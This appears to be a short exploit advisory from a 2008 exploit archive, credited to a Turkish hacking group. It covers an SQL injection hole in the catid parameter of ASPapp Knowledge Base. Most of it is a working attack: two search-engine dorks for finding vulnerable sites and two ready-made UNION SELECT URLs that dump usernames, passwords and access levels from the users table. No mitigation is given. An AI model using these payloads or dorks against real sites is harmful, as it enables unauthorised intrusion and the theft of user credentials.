ASPapp Knowledge Base Remote SQL Injection Vulnerability

2008-03-20 00:00:00

..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##

-------------------------Turkey------------------------------

-----------------www.Hayalet-hack.com------------------------

-----------------www.xcorpitx-hack.com-----------------------

ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability
-------------------------------------------------------------

-------
Dork 1 - content_by_cat.asp?contentid ''catid''

Dork 2 - content_by_cat.asp? ''catid''
-------
exploit-
-------

-------------------------------------------------------------
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
-------------------------------------------------------------

-------------------------------------------------------------
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

#

Fixes

No fixes

In order to submit a new fix you need to be registered.